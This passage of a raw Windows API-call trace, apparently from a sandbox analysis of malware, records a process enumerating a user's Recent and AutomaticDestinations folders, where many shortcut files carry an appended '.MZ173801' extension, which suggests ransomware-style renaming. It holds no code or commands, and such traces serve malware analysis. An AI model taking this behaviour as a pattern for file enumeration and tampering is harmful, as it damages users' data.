lpLocalFileTime=0x19fa5c) returned 1 [0113.157] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.157] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76288cc6, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x76288cc6, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa0e10eb9, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x59c, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="6E4Yux.lnk.MZ173801", cAlternateFileName="6E4YUX~1.MZ1")) returned 1 [0113.157] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.157] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.157] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea684180, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea684180, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa0e10eb9, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x339, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="6ja7hKM dEHm7uKsn.lnk.MZ173801", cAlternateFileName="6JA7HK~1.MZ1")) returned 1 [0113.157] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.157] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.157] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70979561, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x70979561, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa0e3723e, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x37f, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="6o05.lnk.MZ173801", cAlternateFileName="6O05LN~1.MZ1")) returned 1 [0113.157] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.158] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.158] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeac7a032, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeac7a032, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa0fdaa84, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3d1, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="7CvyycdQ.lnk.MZ173801", cAlternateFileName="7CVYYC~1.MZ1")) returned 1 [0113.158] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.158] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.158] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeab95143, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeab95143, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa1000dda, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3c4, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="7L1WKCQLeheP.lnk.MZ173801", cAlternateFileName="7L1WKC~1.MZ1")) returned 1 [0113.158] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.158] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.158] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeacc6b10, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeacc6b10, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa1000dda, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x592, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="8MMQ.lnk.MZ173801", cAlternateFileName="8MMQLN~1.MZ1")) returned 1 [0113.158] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.158] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.158] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7603b36d, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x7603b36d, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa1000dda, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3dd, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="8nrtvJPSXWSOarKar.lnk.MZ173801", cAlternateFileName="8NRTVJ~1.MZ1")) returned 1 [0113.158] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.158] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.158] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea1bf4ff, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea1bf4ff, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa102a98d, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x288, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="93FAioEJ-r.lnk.MZ173801", cAlternateFileName="93FAIO~1.MZ1")) returned 1 [0113.158] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.158] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.158] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb488443, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeb488443, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa11caa7d, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3ee, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="a TQSWLwdnXwLBG6xlM.lnk.MZ173801", cAlternateFileName="ATQSWL~1.MZ1")) returned 1 [0113.158] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.158] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.158] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea316981, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea316981, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa11f103c, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x54c, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="AGpwWiEbNPs_OK mC0E.lnk.MZ173801", cAlternateFileName="AGPWWI~1.MZ1")) returned 1 [0113.158] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.158] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.158] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeacec7c2, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xa384288f, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa3868b3e, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x497, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="ATjrrwOvtU.lnk", cAlternateFileName="ATJRRW~1.LNK")) returned 1 [0113.158] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.158] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.158] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeacec7c2, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x75ee4ef7, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa11f103c, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x497, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="ATjrrwOvtU.lnk.MZ173801", cAlternateFileName="ATJRRW~1.MZ1")) returned 1 [0113.158] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.158] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.158] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf95bd2d, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x67fe51f2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x67fe51f2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="AutomaticDestinations", cAlternateFileName="AUTOMA~1")) returned 1 [0113.158] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.158] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.158] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*.*", lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf95bd2d, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x67fe51f2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe934f82b, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName=".", cAlternateFileName="")) returned 0xa1bc78 [0113.158] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf95bd2d, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x67fe51f2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe934f82b, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="..", cAlternateFileName="")) returned 1 [0113.159] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x651ffc2f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x651ffc2f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x651ffc2f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="162797d679096999.automaticDestinations-ms", cAlternateFileName="162797~1.AUT")) returned 1 [0113.159] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f794 | out: lpLocalFileTime=0x19f794) returned 1 [0113.159] FileTimeToDosDateTime (in: lpFileTime=0x19f794, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.159] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ce308d7, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x8ce308d7, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x92aa4b2b, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="1b4dd67f29cb1962.automaticDestinations-ms", cAlternateFileName="1B4DD6~1.AUT")) returned 1 [0113.159] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.159] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.159] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6623dd20, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6623dd20, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x66263f3d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="1b6ebacd7cd2f25a.automaticDestinations-ms", cAlternateFileName="1B6EBA~1.AUT")) returned 1 [0113.159] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.159] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.159] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66a9610b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x66a9610b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x66a9610b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="1bc9bbbe61f14501.automaticDestinations-ms", cAlternateFileName="1BC9BB~1.AUT")) returned 1 [0113.159] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.159] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.159] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f0b5bcc, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3f0b5bcc, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x91fc39db, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="319f01bf9fe00f2d.automaticDestinations-ms", cAlternateFileName="319F01~1.AUT")) returned 1 [0113.159] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.159] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.159] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x658b4643, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x658b4643, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x658b4643, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="5175b273ceba776b.automaticDestinations-ms", cAlternateFileName="5175B2~1.AUT")) returned 1 [0113.159] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.159] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.159] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xcb9438a8, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xa384288f, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x25478, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="5f7b5f1e01b83767.automaticDestinations-ms", cAlternateFileName="5F7B5F~1.AUT")) returned 1 [0113.159] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.159] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.159] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64e6c3a5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x64e6c3a5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x64e6c3a5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="61ebb1e65cfcb8da.automaticDestinations-ms", cAlternateFileName="61EBB1~1.AUT")) returned 1 [0113.159] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.159] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.159] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef89c12b, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xef89c12b, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xef89c12b, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="6824f4a902c78fbd.automaticDestinations-ms", cAlternateFileName="6824F4~1.AUT")) returned 1 [0113.159] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.159] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.159] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66e75d9e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x66e75d9e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x66e75d9e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="6d2bac8f1edf6668.automaticDestinations-ms", cAlternateFileName="6D2BAC~1.AUT")) returned 1 [0113.159] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.159] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.159] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66669e90, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x66669e90, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x66669e90, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="75668a91ce73b054.automaticDestinations-ms", cAlternateFileName="75668A~1.AUT")) returned 1 [0113.159] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.160] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.160] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67a61ae6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x67a61ae6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x67a61ae6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="78f0afb5bd4bb278.automaticDestinations-ms", cAlternateFileName="78F0AF~1.AUT")) returned 1 [0113.160] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.160] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.160] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37f27bc, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x37f27bc, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x5bc77d9d, ftLastWriteTime.dwHighDateTime=0x1d5e877, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="7e4dca80246863e3.automaticDestinations-ms", cAlternateFileName="7E4DCA~1.AUT")) returned 1 [0113.160] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.160] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.160] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65cba52e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x65cba52e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x65cba52e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="80d13f95c2c02af9.automaticDestinations-ms", cAlternateFileName="80D13F~1.AUT")) returned 1 [0113.160] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.160] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.160] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6765bb0e, ftCreationTime.dwHighDateTime=0x1d327e7, 